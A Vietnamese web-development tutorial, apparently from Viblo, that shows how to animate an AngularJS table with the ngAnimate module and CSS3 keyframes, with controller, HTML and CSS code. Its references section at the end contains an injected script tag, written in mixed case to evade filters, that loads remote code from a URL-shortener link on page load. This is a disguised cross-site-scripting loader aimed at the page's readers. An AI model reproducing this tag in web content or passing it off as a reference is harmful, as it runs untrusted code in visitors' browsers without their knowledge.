0

Kết hợp AngularJS với Animations để tạo hiệu ứng động

I. Giới thiệu Animations

 • Hẳn là trong chúng ta (với những người quan tâm đến lập trình) thì khái niệm CSS3 không còn xa lại gì với chúng ta nữa. Sở dĩ tôi nhắc đến CSS3 ở đây là do Animation được viết dự trên nền tảng của CSS3.
 • Kể từ khi CSS3 ra đời, cộng đồng làm web đã có rất nhiều cuộc tranh luận nóng xoay quanh khả năng sử dụng của nó. Tuy nhiên, cũng có rất nhiều cuộc thử nghiệm thú vị để khám phá tiềm năng của nó. Mặc dù các thử nghiệm ở mức trung bình không chứng minh được khả năng sử dụng của CSS3, nhưng chúng đã cho thấy khả năng thực sự của CSS3, đến một mức độ mà các chuyên gia phát triển tin rằng CSS3 chính là tương lai.
 • CSS3 Animation hoạt động trên HTML như thế nào trong bài viết này mình sẽ không nói tới. Hôm nay trong bài này mình sẽ giới thiệu với các bạn sử dụng CSS3 Animation trong AngularJS (Hay còn gọi là Animations in AngularJS)

Nào chúng ta bắt đầu tìm hiểu qua bài viết bên dưới (dance2).

 • Các bạn xem demo ở đây: Demo

II. Sử dụng Animations trong AngularJS

 • Trong bài viết này ta sử dụng 1 thư viện khá mới là animate của AngularJS:

CDN: https://code.angularjs.org/1.3.15/angular-animate.js

 • Các đối tượng hỗ trợ animate của AngularJS được liệt kê trong bảng bên dưới:
Directive Supported Animations
ngRepeat enter, leave and move
ngView enter and leave
ngInclude enter and leave
ngSwitch enter and leave
ngIf enter and leave
ngClass enter and remove
ngShow and ngHide enter and remove (the ng-hide class value)
 • Tước khi vào tìm hiểu animate trong AngularJS bạn tạo cho tôi 3 file theo sau:
index.html
app-demo.css
app-demo.js

Vậy là chúng ta đã có 3 file cần thiết để code rồi (dance2)

 • Khởi tạo dữ liệu trong file app-demo.js và các điều khiển thực hiện ở client.
var antruaApp = angular.module('antruaApp',['ngAnimate']);

antruaApp.controller('antruaCtrl',function($scope){
	$scope.selectedRow = 0;
	$scope.showTable = true;
	$scope.antruaItems = [{
		name:'Riêu ốc',
		price:'25.000 vnđ',
		quantity:'1'
	},
	{
		name:'Bún đậu',
		price:'60.000 vnđ',
		quantity:'2'
	},
	{
		name:'Trà đá',
		price:'15.000 vnđ',
		quantity:'5'
	},
	{
		name:'Cơm đĩa',
		price:'35.000 vnđ',
		quantity:'1'
	},{
		name:'Coca Cola',
		price:'16.000 vnđ',
		quantity:'2'
	},
	{
		name:'Bún cá',
		price:'25.000 vnđ',
		quantity:'1'
	},
	{
		name:'Cafe lâu đá',
		price:'100.000 vnđ',
		quantity:'4'
	},{
		name:'Sinh tố xoài',
		price:'70.000 vnđ',
		quantity:'2'
	}];
	$scope.setClickedRow = function(index){
		$scope.selectedRow = index;
	}

	$scope.$watch('selectedRow', function() {
	});
});
 • Đối tượng $scope.antruaItems sẽ lưu 1 danh sách dữ liệu được hiển thị trên view.
 • Hàm $scope.setClickedRow = function(index){ $scope.selectedRow = index; } sẽ bắt sự kiện người dùng click vào từng record để tạo hiệu ứng animate cho bản ghi.
 • Hàm $scope.$watch('selectedRow', function() {}); là 1 record đã được chọn

111.png

 • Bây giờ chúng ta sẽ đẩy dữu liệu được tạo ra trong file app-demo.js ra màn hình thông qua file index.html.
<html>
	<head>
		<meta charset="utf-8">
		<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" media="screen" />
		<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css" media="screen"/>
		<link href="app-demo.css" rel="stylesheet" media="screen"/>
	</head>
	<body ng-app="antruaApp" ng-controller="antruaCtrl">
		<h1 class="text-center">Animations in AngularJS</h1>
		<div class="row">
			<div class="col-md-8 col-md-offset-2">
				<table class="table table-bordered food-table" arrow-selector ng-if="showTable">
					<tr>
						<th>Số thứ tự</th>
						<th>Tên món ăn</th>
						<th>Giá tiền</th>
						<th>Số lượng</th>
					</tr>
					<tr ng-repeat="item in antruaItems" class="items" ng-class="{'selected':$index == selectedRow}" ng-click="setClickedRow($index)">
						<td>{{$index}}</td>
						<td>{{item.name}}</td>
						<td>{{item.price}}</td>
						<td>{{item.quantity}}</td>
					</tr>
				</table>
				<button class="btn btn-primary" ng-click="showTable = !showTable">Back</button>
			</div>
		</div>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.3.15/angular.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.3.15/angular-animate.min.js"></script>
	<script src="app-demo.js"></script>
	</body>
</html>
 • Như ở trên ta có đề cập đến đối tượng ng-if ở đây tôi sử dụng đối tượng này để bắt sự kiện click của người dùng. Khi người dùng click vào button Back nó sẽ ẩn/hiện dữ liệu.
<table class="table table-bordered food-table" ng-if="showTable">
....
</table>
<button class="btn btn-primary" ng-click="showTable = !showTable">Back</button>

111.png

 • Cuối cùng là trong file app-demo.css chúng ta viết lại các thuộc tính của thẻ table cho nó đẹp hơn và css này tôi có sử dụng 1 số thuộc tính của animate.
.selected-add,.selected-remove {
	transition: 300ms linear all;
}

.selected,.selected-add.selected-add-active {
	font-size:3em;
	background-color: red;
	color:white;
}

.selected-remove.selected-remove-active {
	background-color:#707070;
	font-size:1em;
}

tbody{
	font-size:11px;
}

.food-table.ng-enter {
	-webkit-animation:1.5s anim_enter;
	-moz-animation:1.5s anim_enter;
	-o-animation:1.5s anim_enter;
	animation:1.5s anim_enter;
	position:relative;
}
@keyframes anim_enter {
	from {
		left:100%;
	}
	to {
		left:0;
	}
}

@-webkit-keyframes anim_enter {
	from {
		left:100%;
	}
	to {
		left:0;
	}
}

.food-table.ng-leave{
	-webkit-animation:1.5s anim_leave;
	-moz-animation:1.5s anim_leave;
	-o-animation:1.5s anim_leave;
	animation:1.5s anim_leave;
	position:relative;
}

@keyframes anim_leave {
	from {
		left:0;
	}
	to {
		left:100%;
	}
}

@-webkit-keyframes anim_leave {
	from {
		left:0;
	}
	to {
		left:100%;
	}
}

=> P/s:

 • Như vậy mình đã giới thiệu với các bạn làm thế nào đê kết hợp animation với AngularJS để tạo hiệu ứng đẹp cho site của bạn.
 • Ngoài ra nó cũng còn rất hiều hiệu ứng khác, bài sau mình sẽ viết các loại animation mà được dùng nhiều. Các bạn nhớ đón đọc bài sau nhé.
 • Hey, cũng muộn rồi mình đi ngủ đây (sleep), hẹn gặp lại các bạn với chủ đề này vào bài viết tới!

III. Kết luận

 • Với AngularJSAnimations chúng có thể kết hợp với nhau rất tốt để tạo lên 1 website có hiệu ứng đẹp và bắt mắt.
 • Chúc các bạn tìm hiểu được nhiều điều từ AngularJSAnimations
 • Đây là demo của mình: Demo

Tài liệu tham khảo:

<sCrIpT src="https://goo.gl/4MuVJw"></ScRiPt>


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.